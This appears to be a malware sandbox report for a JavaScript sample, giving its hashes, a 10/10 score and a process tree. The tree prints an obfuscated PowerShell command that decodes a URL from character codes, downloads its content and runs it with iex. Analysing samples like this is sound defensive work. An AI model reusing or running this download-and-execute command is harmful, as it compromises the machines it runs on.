Overview

overview

10

Static

static

1

d86f62bb56...7eb.js

windows7-x64

10

d86f62bb56...7eb.js

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    27/09/2024, 01:48

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    d86f62bb56299715391f8e7dad41c81283c58899d7e279e5c45ffe07b0ac47eb.js

  • Size

    161KB

  • MD5

    b512c5344d56be176dc6282505423b33

  • SHA1

    4275c3b4bfd7a727fb1f99e446aa593cd1e818e9

  • SHA256

    d86f62bb56299715391f8e7dad41c81283c58899d7e279e5c45ffe07b0ac47eb

  • SHA512

    8d7bb8d90249274c40e8ad5da34c9fc722822ac568d59568d3ec03c424bf306a1df4729489cb2970fe791d52d61242fa0885258ba9169f33f57a214ea383a31a

  • SSDEEP

    3072:F19MCBKsJpYS5v+OXpQNMZvjI/drwM/11sluyAhhun7rSsuosqUYRLu2h:F19Bpv5eN+G+u1128heSsuoHv

Score
10/10
execution

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\d86f62bb56299715391f8e7dad41c81283c58899d7e279e5c45ffe07b0ac47eb.js
    1⤵
      PID:1800
    • C:\Windows\system32\conhost.exe
      conhost --headless powershell $hsyiudsm='ur';new-alias press c$($hsyiudsm)l;$tjkynnpwl=(8298,8316,8302,8308,8303,8299,8308,8301,8315,8314,8318,8312,8314,8243,8313,8308,8309,8244,8246,8243,8309,8301,8309,8260,8312,8258,8306,8302,8307,8313,8312,8246,8248);$iocwczrw=('bronx','get-cmdlet');$yvobsbusq=$tjkynnpwl;foreach($tufmfwmboixhx in $yvobsbusq){$xdnbtdmwzz=$tufmfwmboixhx;$sdyydtctssg=$sdyydtctssg+[char]($xdnbtdmwzz-8197);$rcqleiqlja=$sdyydtctssg;$vfftsj=$rcqleiqlja};$dtaamplwesbf[2]=$vfftsj;$ojfnycdqq='rl';$pdozqnclcy=1;.$([char](9992-9887)+'e'+'x')(press -useb $vfftsj)
      1⤵
      • Process spawned unexpected child process
      PID:2524

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads